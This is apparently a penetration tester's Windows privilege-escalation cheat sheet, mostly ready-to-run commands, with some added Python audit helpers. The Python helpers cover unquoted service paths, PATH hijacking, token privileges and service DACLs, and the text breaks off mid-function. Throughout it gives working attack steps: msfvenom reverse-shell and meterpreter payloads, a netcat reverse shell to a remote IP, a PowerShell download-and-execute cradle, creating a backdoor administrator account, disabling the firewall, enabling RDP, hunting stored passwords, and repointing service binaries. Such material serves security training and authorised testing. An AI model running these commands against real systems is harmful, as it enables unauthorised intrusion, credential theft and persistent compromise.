Manual Exploitation
Start with Common Commands
0. Check Who You Are and What You Can Do
whoami
whoami /groups
whoami /priv
net user %username%
Are you an Administrator? Do you have high-privilege tokens like SeImpersonatePrivilege?
1. Check if You Have Administrator Access
net session
If you get "Access is denied", you're not admin.
2. Check System Version and Patch Level
systeminfo
ver
Look for unpatched privilege escalation exploits (e.g. MS16-032, PrintNightmare, the Potato family).
3. Check Scheduled Tasks
schtasks /query /fo LIST /v
Look for tasks running as SYSTEM or Administrator, especially with writable paths.
4. Check Services and Their Paths
sc query state= all
wmic service get name,displayname,pathname,startmode
Search for Unquoted Service Paths or misconfigured services with writable folders.
5. Check for Writable Folders/Files
icacls "C:\Program Files" /t
Look for F (Full Control) granted to non-admin users.
6. Search for Passwords in Files
findstr /si password *.txt *.xml *.ini
Check C:\Users, AppData, ProgramData, Desktop, etc.
7. Check Installed Programs (Potentially Vulnerable)
wmic product get name,version
Look for vulnerable software like TeamViewer, Java, WinRAR, etc.
8. Check Users and Profiles
net users
dir C:\Users
Any admin profiles? Can you read their files?
9. Token Privileges and Impersonation
whoami /priv
If you have SeImpersonatePrivilege, you can use JuicyPotato, PrintSpoofer, etc.
10. Check Network Shares and Mapped Drives
net share
net use
Look for C$, ADMIN$, or mapped drives with sensitive content.
11. DLL Hijacking Possibilities
- Look for services or apps that load DLLs from writable folders.
- Use Process Monitor (Procmon) and Autoruns to identify DLL search paths.
12. PowerShell Environment Info
$PSVersionTable
Older versions might be less secure. Check for available modules like PowerView.
Windows Directory Structure
Directory | Description |
---|---|
A:\, B:\, C:\, D:\ | Named drives assigned to physical or logical disks |
C:\Program Files | Default location for installed 64-bit programs |
C:\Program Files (x86) | Default location for installed 32-bit and legacy (16-bit) programs |
C:\Users | Contains user profile folders (one per user) |
└── Desktop, Downloads, etc. | Each user folder contains personal Desktop, Downloads, Documents, etc. |
C:\Windows | Core Windows directory |
└── system, system32 | Contains essential system executables (.exe) and libraries (.dll) |
C:\Inetpub | Default directory for IIS (Internet Information Services) web server files |
Operating System
What is the OS and architecture? Is it missing any patches? (!)
systeminfo
wmic qfe
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Users
Who are you? (!)
whoami
whoami /all
# shows all information about that user
hostname
echo %USERNAME%
$env:UserName
All users
What users are on the system? Any old user profiles that weren’t cleaned up? We list the other user accounts on the box and view our own user’s information in a bit more detail.
net users
net user administrator
# Get information for particular user
dir /b /ad "C:\Users\"
dir /b /ad "C:\Documents and Settings\" # Windows XP and below
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Add User
Adding a user that is a member of the Administrators group
net user test test /add && net localgroup Administrators test /add
Groups
What groups are on the system?
net localgroup
Get-LocalGroup | ft Name
Autologon
Anything in the Registry for User Autologon?
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon'
If autologon is configured, we can use the winexe command to spawn a shell with those credentials:
winexe -U 'admin%password123' //192.168.1.22 cmd.exe
Programs, Processes, and Services
Software
What software is installed?
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Services
What processes/services are running on the system? Is there an internal service that is not exposed externally? If so, can we reach it?
tasklist /svc
tasklist /v
net start
sc query
# information about services and drivers can be obtained
sc start service_name
# To start service
sc stop service_name
# To stop running service
This one-liner returns the process owner without requiring admin rights; if the Owner column is blank, the process is probably running as SYSTEM, NETWORK SERVICE, or LOCAL SERVICE.
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
Scheduled Tasks
What scheduled tasks are there? Anything custom implemented?
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks
schtasks /query /fo LIST /v
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Networking
NICs
What NICs are connected? Are there multiple networks?
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Routes
What routes do we have?
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
ARP
Anything in the ARP cache?
arp -a
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
Connections
Are there connections to other hosts?
netstat -ano
Hosts File
C:\WINDOWS\System32\drivers\etc\hosts
Firewall
Is the firewall turned on? If so what’s configured?
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall export "firewall.txt"
netsh firewall set opmode mode=disable
# To Disable firewall
Enable RDP
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
SNMP configurations
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
Weak File and Folder Permissions
Listing files
dir /a
# list all files (even hidden files)
dir /s
# searches folders
dir /s *password*
# search the system for files containing 'password' in the filename
findstr /si password *.txt
# search .txt files recursively (case-insensitive) for the keyword 'password'
Icacls
Are there any weak folder or file permissions? Full Permissions for Everyone or Users on Program Folders?
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
Modify Permissions for Everyone or Users on Program Folders?
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
Sensitive Information
Yes, passwords.
Even administrators re-use their passwords, or leave their passwords on systems in readable locations.
Windows can be especially vulnerable to this, as several features of Windows store passwords insecurely.
Registry
Searching registry for password
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
.\winPEASany.exe quiet filesinfo userinfo
If we obtained any credentials, we can use winexe to log into the box:
winexe -U 'admin%password123' //192.168.1.22 cmd.exe
Saved Creds
Windows has a runas command which allows users to run commands with the privileges of other users.
This usually requires the knowledge of the other user’s password.
However, Windows also allows users to save their credentials to the system, and these saved credentials can be used to bypass this requirement.
cmdkey /list
.\winPEASany.exe quiet cmd windowscreds
We can use the saved credential to run any command as the admin user. Start a listener on Kali and run the reverse shell executable:
runas /savecred /user:admin C:\PrivEsc\reverse.exe
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
runas /savecred /user:Administrator "cmd.exe /k whoami"
Configuration Files
Some administrators will leave configurations files on the system with passwords in them.
The Unattend.xml file is an example of this.
It allows for the largely automated setup of Windows systems.
dir /s *pass* == *.config
# Recursively search for files in the current directory with “pass” in the name, or ending in “.config”
findstr /si password *.xml *.ini *.txt
# Recursively search for files in the current directory that contain the word “password” and also end in either .xml, .ini, or .txt
Is XAMPP, Apache, or PHP installed? Are there any XAMPP, Apache, or PHP configuration files?
dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf
Get-Childitem -Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue
Once again we can simply use winexe to spawn a shell as the admin user.
Unattend and sysprep
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
IIS
If the server is an IIS webserver, what’s in inetpub? Any hidden directories? web.config files?
dir /a C:\inetpub\
dir /s web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
What’s in the IIS Logs?
C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
Unquoted Service Path
The Unquoted Service Path vulnerability arises from the way Windows interprets the file path of a service binary (executable). A path that contains spaces should be enclosed in double quotes. If it is not, Windows tries each space-delimited prefix of the path as the executable before the intended one, so a writable folder along that path is a potential Unquoted Service Path vulnerability.
For example, the following path would be vulnerable:
C:\Program Files\something\winamp.exe
Not vulnerable
"C:\Program Files\something\winamp.exe"
We could place our payload at any of the following paths:
C:\winamp.exe (a reverse shell with the same name as the legitimate program)
Required Things
- A service whose binary path is unquoted and contains one or more spaces.
- Write permission on one of the folders along that path.
- A way to restart the service or reboot the system so that the payload executes.
Finding unquoted services
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
sc qc <service_name>
# verify with sc
Checking writable permission
icacls "C:\Program Files (x86)\Program Folder"
Creating malicious program
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[LHOST IP] LPORT=443 -f exe -o Some.exe
Managing Services
Once the payload has been placed in the target directory, restart the service to execute it:
sc stop <service_name>
sc start <service_name>
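As an added example (not part of the original notes), the following Python models the probing order Windows applies to an unquoted service path and checks each probed location against a set of writable folders. The service list and the writable-folder set are constructed stand-ins for the wmic and icacls output above; on a real host they would come from those commands.

```python
import ntpath
import re
from typing import Iterable, List, Set, Tuple

# Constructed stand-in for `wmic service get name,displayname,pathname,startmode`
# output, as (name, pathname, startmode) tuples.
SERVICES = [
    ("Spooler",   r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("QuotedSvc", r'"C:\Program Files\Other Vendor\svc.exe" -k run', "Auto"),
    ("VulnSvc",   r"C:\Program Files\Some Vendor\svc host\winamp.exe", "Auto"),
    ("ManualSvc", r"C:\Program Files\Some Vendor\tool.exe", "Manual"),
]

# Constructed stand-in for icacls results: folders where Everyone or
# BUILTIN\Users holds (F) or (M). Assumed for this example only.
WRITABLE_DIRS = {r"C:\Program Files\Some Vendor"}


def _norm(path: str) -> str:
    return ntpath.normpath(path).lower()


def is_unquoted_with_spaces(pathname: str) -> bool:
    """Same test as the wmic | findstr pipeline above: no leading quote, has a space."""
    p = pathname.strip()
    return not p.startswith('"') and " " in p


def candidate_paths(pathname: str) -> List[str]:
    """Executables Windows probes, in order, for an unquoted service path.

    CreateProcess treats every space as a possible end of the executable name
    and appends .exe to a candidate without an extension, so
    C:\\Program Files\\Some Vendor\\svc host\\winamp.exe is probed as
    C:\\Program.exe, C:\\Program Files\\Some.exe, ... before the real binary.
    Anything after the first .exe is treated as arguments and ignored.
    """
    m = re.search(r"\.exe\b", pathname, re.IGNORECASE)
    exe = pathname[: m.end()] if m else pathname.strip()
    candidates = []
    for i, ch in enumerate(exe):
        if ch == " ":
            prefix = exe[:i]
            if not ntpath.splitext(prefix)[1]:
                prefix += ".exe"
            candidates.append(prefix)
    candidates.append(exe)
    return candidates


def audit(services: Iterable[Tuple[str, str, str]],
          writable_dirs: Set[str]) -> List[Tuple[str, str]]:
    """(service, probed path) pairs whose parent folder is writable.

    Filters like the notes above: Auto-start services only, nothing under C:\\Windows.
    """
    writable = {_norm(d) for d in writable_dirs}
    findings = []
    for name, pathname, startmode in services:
        if startmode.lower() != "auto" or not is_unquoted_with_spaces(pathname):
            continue
        if _norm(pathname).startswith("c:\\windows\\"):
            continue
        for cand in candidate_paths(pathname):
            if _norm(ntpath.dirname(cand)) in writable:
                findings.append((name, cand))
    return findings


if __name__ == "__main__":
    for svc, cand in audit(SERVICES, WRITABLE_DIRS):
        print(f"{svc}: a binary at {cand} would run as the service account")
```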
Runas / Switch User
Use Case
- After gaining a low-privileged shell on a Windows system through network/web application vulnerabilities.
- Admin credentials may be obtained using tools like hashdump, wce.exe, or fgdump.exe.
- Remote Desktop may be disabled; direct login as another user is not possible.
Using runas
Command
runas /user:username program
- If the password prompt appears: input the password to switch users.
- If no password prompt: use a PowerShell script instead.
PowerShell Method
ps-sudo.ps1
$pw = ConvertTo-SecureString "b33fpassword" -AsPlainText -Force
$pp = New-Object System.Management.Automation.PSCredential -ArgumentList "b33f", $pw
$script = 'C:\Windows\Temp\nc.bat'
# launch a PowerShell as b33f that runs nc.bat; -verb Runas requests elevation for that user
Start-Process powershell -Credential $pp -ArgumentList "-noprofile -command &{Start-Process $script -verb Runas}"
nc.bat
C:\Windows\Temp\nc.exe 10.11.1.40 443 -e cmd.exe
Executing the Script Remotely
powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/')
AlwaysInstallElevated
AlwaysInstallElevated is a Windows setting that allows non-privileged users to install Microsoft Windows Installer Package Files (MSI) with elevated system permissions. This means that we can use this feature to execute a malicious MSI installer package with administrator permissions. To achieve this, two registry entries have to be set to the value 1 to be enabled.
Check the value of these registry keys
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Get-ItemProperty HKLM:\Software\Policies\Microsoft\Windows\Installer
Get-ItemProperty HKCU:\Software\Policies\Microsoft\Windows\Installer
Generating Payload
msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[LHOST IP] LPORT=443 -f msi -o filename.msi
Executing msi file
msiexec /quiet /qn /i C:\Users\filename.msi
Unattended Installs
Unattended Installs allow Windows to be deployed with little or no active involvement from an administrator. If administrators fail to clean up after such a process, an Extensible Markup Language (XML) file called Unattend is left on the local system. This file contains all the configuration settings that were set during the installation process, some of which can involve the configuration of local accounts, including Administrator accounts!
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
# Display the content of these files
Unattend credentials are base64-encoded and can be decoded with the base64 utility.
$PATH Interception
Requirements:
- PATH contains a folder that is writable by low-privileged users.
- The writable folder appears before the folder that contains the legitimate binary.
List the contents of the PATH environment variable
$env:Path
# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32
Checking writable permission
icacls.exe "C:\Program Files\nodejs\"
Placing malicious binary
copy evil-file.exe "C:\Program Files\nodejs\cmd.exe"
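As an added example (not from the original notes), this Python models the lookup order for a bare command name and reports which writable PATH entries are searched before the legitimate binary's folder. The PATH value and the writable-directory set are constructed stand-ins for $env:Path and icacls output; the block also models the CreateProcess search order, which consults the system directories before PATH and is therefore not affected by this trick for system binaries.

```python
import ntpath
from typing import List, Set

# Constructed $env:Path value: the example output above plus two more entries.
PATH_SAMPLE = r"C:\Program Files\nodejs\;C:\WINDOWS\system32;C:\WINDOWS;C:\Tools\bin"
# Constructed stand-in for icacls results: directories where non-admins hold (M) or (F).
WRITABLE_DIRS = {r"C:\Program Files\nodejs", r"C:\Tools\bin"}
# Directories CreateProcess searches before consulting PATH at all.
SYSTEM_DIRS = [r"C:\WINDOWS\system32", r"C:\WINDOWS\System", r"C:\WINDOWS"]


def _norm(p: str) -> str:
    return ntpath.normpath(p).lower()


def split_path(value: str) -> List[str]:
    """Split a Windows PATH value, dropping empty entries and trailing backslashes."""
    return [ntpath.normpath(e) for e in value.split(";") if e.strip()]


def search_order(path_value: str, via_cmd: bool, cwd: str = r"C:\Users\low") -> List[str]:
    """Directory order used to resolve a bare command name such as cmd.exe.

    via_cmd=True models cmd.exe: current directory, then the PATH entries in order.
    via_cmd=False models CreateProcess: current directory, then the system
    directories, then PATH, so a planted cmd.exe on PATH never beats System32 there.
    """
    head = [cwd] if via_cmd else [cwd] + SYSTEM_DIRS
    return head + split_path(path_value)


def interceptable(path_value: str, writable: Set[str],
                  legit_dir: str, via_cmd: bool) -> List[str]:
    """Writable directories searched before legit_dir: a same-named binary there wins."""
    w = {_norm(d) for d in writable}
    hits = []
    for d in search_order(path_value, via_cmd):
        if _norm(d) == _norm(legit_dir):
            break
        if _norm(d) in w:
            hits.append(d)
    return hits


if __name__ == "__main__":
    # Where a fake cmd.exe would win when resolved by cmd.exe vs. by CreateProcess.
    print(interceptable(PATH_SAMPLE, WRITABLE_DIRS, r"C:\WINDOWS\system32", via_cmd=True))
    print(interceptable(PATH_SAMPLE, WRITABLE_DIRS, r"C:\WINDOWS\system32", via_cmd=False))
```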
Kernel Exploitation
Finding kernel exploit
Finding and using kernel exploits is usually a simple process:
- Enumerate Windows version / patch level (systeminfo).
- Find matching exploits (Google, ExploitDB, GitHub).
- Compile and run.
Known Exploits
List of kernel exploits: https://github.com/SecWiki/windows-kernel-exploits
Common Windows Exploit Reference Table
Security Bulletin | KB | Description | Operating System |
---|---|---|---|
MS17-017 | KB4013081 | GDI Palette Objects Local Privilege Escalation | Windows 7/8 |
CVE-2017-8464 | - | LNK Remote Code Execution Vulnerability | Windows 10/8.1/7/2016/2010/2008 |
CVE-2017-0213 | - | Windows COM Elevation of Privilege Vulnerability | Windows 10/8.1/7/2016/2010/2008 |
CVE-2018-0833 | - | SMBv3 Null Pointer Dereference DoS | Windows 8.1/Server 2012 R2 |
CVE-2018-8120 | - | Win32k Elevation of Privilege Vulnerability | Windows 7 SP1/2008 SP2/2008 R2 SP1 |
MS17-010 | KB4013389 | Windows Kernel Mode Drivers | Windows 7/2008/2003/XP |
MS16-135 | KB3199135 | Windows Kernel Mode Drivers | Windows Server 2016 |
MS16-111 | KB3186973 | Kernel API | Windows 10 10586 (32/64)/8.1 |
MS16-098 | KB3178466 | Kernel Driver | Windows 8.1 |
MS16-075 | KB3164038 | Hot Potato | 2003/2008/7/8/2012 |
MS16-034 | KB3143145 | Kernel Driver | 2008/7/8/10/2012 |
MS16-032 | KB3143141 | Secondary Logon Handle | 2008/7/8/10/2012 |
MS16-016 | KB3136041 | WebDAV | 2008/Vista/7 |
MS16-014 | KB3134228 | Remote Code Execution | 2008/Vista/7 |
MS03-026 | KB823980 | Buffer Overrun In RPC Interface | NT/2000/XP/2003 |
Important Tools
Windows Exploit Suggester: https://github.com/bitsadmin/wesng
Precompiled Kernel Exploits: https://github.com/SecWiki/windows-kernel-exploits
Watson: https://github.com/rasta-mouse/Watson
Hot Potatoes
Service Accounts
Service accounts can be given special privileges in order for them to run their services, and cannot be logged into directly.
Unfortunately, multiple problems have been found with service accounts, making it easier to escalate privileges through them.
C:\Windows\Temp>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\Windows\Temp>
SeImpersonatePrivilege is enabled, so we can impersonate other users.
If the machine is Windows 10 1809 / Windows Server 2019 or newer, try Rogue Potato.
If the machine is older than Windows 10 1809 / Windows Server 2019, try Juicy Potato.
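As an added example (not from the original notes), this Python parses the whoami /priv output above (it also accepts copies whose column padding has been collapsed) and flags token privileges that matter for escalation: the two the Potato family relies on, extended with a few other well-known high-risk privileges (SeDebug, SeBackup, SeRestore, SeTakeOwnership, SeLoadDriver), plus the build-number rule stated above for which Potato variant applies (Windows 10 1809 and Server 2019 are build 17763).

```python
from typing import Dict

# Constructed copy of the `whoami /priv` output shown above.
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges the Potato family abuses (from the notes above), plus other token
# privileges that by themselves give SYSTEM-equivalent access (generalisation).
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}
OTHER_HIGH_RISK = {"SeDebugPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
                   "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege"}
BUILD_1809 = 17763   # Windows 10 1809 and Windows Server 2019 share this build number


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Map privilege name -> state ("Enabled"/"Disabled") from `whoami /priv` output.

    Only lines after the ===== rule are rows; the description may contain spaces,
    so take the first token as the name and the last as the state. This works on
    the aligned output and on copies where the padding was collapsed to one space.
    """
    privs, in_table = {}, False
    for line in text.splitlines():
        if line.startswith("===="):
            in_table = True
            continue
        parts = line.split()
        if in_table and len(parts) >= 3 and parts[0].startswith("Se"):
            privs[parts[0]] = parts[-1]
    return privs


def token_risk(privs: Dict[str, str]) -> Dict[str, str]:
    """High-risk privileges present in the token, with their state.

    A Disabled privilege still counts: the holder can re-enable it with
    AdjustTokenPrivileges, so presence is what matters for risk.
    """
    return {p: s for p, s in privs.items() if p in IMPERSONATION_PRIVS | OTHER_HIGH_RISK}


def potato_variant(build: int) -> str:
    """The rule above: Rogue Potato from 1809 / Server 2019 up, Juicy Potato below."""
    return "RoguePotato" if build >= BUILD_1809 else "JuicyPotato"


if __name__ == "__main__":
    for name, state in token_risk(parse_whoami_priv(WHOAMI_PRIV)).items():
        print(f"{name}: {state}")
```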
Juicy Potato
https://github.com/ohpe/juicy-potato
Vulnerable Win versions
Windows 7 Enterprise
Windows 8.1 Enterprise
Windows 10 Enterprise
Windows 10 Professional
Windows Server 2008 R2 Enterprise
Windows Server 2012 Datacenter
Windows Server 2016 Standard
1. Create payload
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.12.15 lport=4444 > shell.bat
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.3 LPORT=1337 -f exe > shell.exe
# Alternative if the payload above does not give a stable connection
2. Transfer shell.bat and jp.exe to the target box
3. Run JuicyPotato
./jp.exe -t * -p shell.bat -l 4444
-t: Create process call. For this option we’ll use * to test both options.
-p: The program to run. We’ll need to create a file that sends a reverse shell back to our attack machine.
-l: COM server listen port. This can be anything. We’ll use 4444.
If the default CLSID fails, specify one explicitly from the CLSID list in the juicy-potato repository:
./jp.exe -t * -p shell.bat -l 4444 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Rogue Potato
https://github.com/antonioCoco/RoguePotato
# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999
# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine.
# Use this if you have fw restrictions.
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"
# RoguePotato all in one with RogueOxidResolver running locally on port 9999
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999
# RoguePotato all in one with RogueOxidResolver running locally on port 9999, a specific CLSID and a custom pipe name
RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
Insecure Service Permissions
Each service has an ACL which defines certain service-specific permissions.
Some permissions are innocuous (e.g. SERVICE_QUERY_CONFIG, SERVICE_QUERY_STATUS).
Some may be useful (e.g. SERVICE_STOP, SERVICE_START).
Some are dangerous (e.g. SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS).
If our user has permission to change the configuration of a service which runs with SYSTEM privileges, we can change the executable the service uses to one of our own.
Potential Rabbit Hole: If you can change a service configuration but cannot stop/start the service, you may not be able to escalate privileges!
Identifying Service
.\accesschk.exe /accepteula -uwcqv user daclsvc
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul
# Obtain the permission string of all services
The following commands will print the affected services:
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
Check the current configuration and status of the service
sc qc <service>
sc query <service>
Pointing the service binary path at our payload
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
Starting the service
Start a listener on Kali and start the service on the target box:
net start <service>
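As an added example (not part of the original notes), the following Python parses the SDDL strings that the sc sdshow one-liner above prints and reports, per service, which low-privileged trustees can change the service configuration and whether they can also start and stop it (the rabbit hole noted above). The three SDDL strings are constructed samples; the service names regsvc and daclsvc are only reused from these notes.

```python
import re
from typing import Dict, List, Set, Tuple

# Service-object access rights as they appear in `sc sdshow` SDDL strings.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
# Rights that let the holder repoint or take over the service (GW includes DC on services).
CONFIG_RIGHTS = {"DC", "WD", "WO", "GA", "GW"}
# Low-privileged well-known SID aliases worth flagging (trustee field, not the WD right).
LOW_PRIV_SIDS = {"WD": "Everyone", "BU": "BUILTIN\\Users",
                 "AU": "Authenticated Users", "IU": "INTERACTIVE"}

# Constructed `sc sdshow` output for three services (not captured from a real host).
SDDL_SAMPLES = {
    "regsvc":  "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "daclsvc": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCDCLCSWRPWPDTLOCRRC;;;BU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "cfgonly": "D:(A;;CCDCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)",
}

# ACE layout: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);[^;]*;[^;]*;([^)]*)\)")


def parse_dacl(sddl: str) -> List[Tuple[str, str, Set[str]]]:
    """Return (ace_type, trustee, rights) for each ACE in the DACL, ignoring the SACL."""
    m = re.search(r"D:(.*?)(?:S:|$)", sddl)
    dacl = m.group(1) if m else ""
    aces = []
    for ace_type, _flags, rights, trustee in ACE_RE.findall(dacl):
        if rights.lower().startswith("0x"):      # raw hex mask: keep as a single token
            tokens = {rights}
        else:                                    # two-letter right codes
            tokens = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        aces.append((ace_type, trustee, tokens))
    return aces


def assess(sddl: str) -> Dict[str, Dict[str, object]]:
    """Per low-privileged trustee: rights granted, and whether they can change config / restart."""
    report: Dict[str, Dict[str, object]] = {}
    for ace_type, trustee, rights in parse_dacl(sddl):
        if ace_type != "A" or trustee not in LOW_PRIV_SIDS:
            continue
        acc = report.setdefault(LOW_PRIV_SIDS[trustee],
                                {"rights": set(), "can_change_config": False, "can_restart": False})
        acc["rights"] |= rights
        acc["can_change_config"] = bool(acc["rights"] & CONFIG_RIGHTS)
        acc["can_restart"] = bool(acc["rights"] & {"GA", "GX"}) or {"RP", "WP"} <= acc["rights"]
    return report


def audit(sd_by_service: Dict[str, str]) -> List[Tuple[str, str, str]]:
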